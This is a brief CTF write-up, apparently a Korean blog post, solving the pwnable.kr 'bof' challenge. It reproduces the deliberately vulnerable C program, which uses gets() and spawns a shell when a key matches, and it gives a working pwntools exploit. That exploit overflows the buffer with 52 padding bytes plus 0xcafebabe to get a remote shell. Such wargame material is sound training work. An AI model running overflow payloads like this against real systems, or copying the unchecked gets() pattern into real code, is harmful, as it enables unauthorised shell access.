pwn/pwnable.kr
bof
lok2h4rd
2022. 3. 23. 18:18
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}0xdeadbeef인 key를 0xcafebabe로 overwrite하면 된다
from pwn import *
p = remote("pwnable.kr", 9000)
payload = b"A" * 0x34
payload += p32(0xcafebabe)
p.sendline(payload)
p.interactive()
